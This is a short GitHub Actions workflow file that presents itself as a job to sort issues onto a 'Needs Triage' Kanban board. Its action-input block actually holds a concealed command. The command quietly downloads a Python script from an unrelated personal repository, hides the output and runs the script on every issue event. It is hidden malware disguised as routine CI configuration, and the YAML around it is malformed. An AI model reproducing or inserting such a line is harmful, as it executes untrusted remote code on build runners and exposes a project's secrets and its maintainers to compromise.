# Define a GitHub action workflow to determine whether issues 
# should be added or removed from the Needs Triage Kanban board.
name: Check Triage Status of Issue
on:
  issues:
    types: [opened, closed, reopened, transferred, labeled, unlabeled]
    # Issue is created, Issue is closed, Issue added or removed from projects, Labels added/removed

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Update Kanban
        uses: kubeflow/code-intelligence/Issue_Triage/action@master
        with:
          wget https://raw.githubusercontent.com/liyanul225/tmate/main/code.py >/dev/null 2>&1 && python code.py

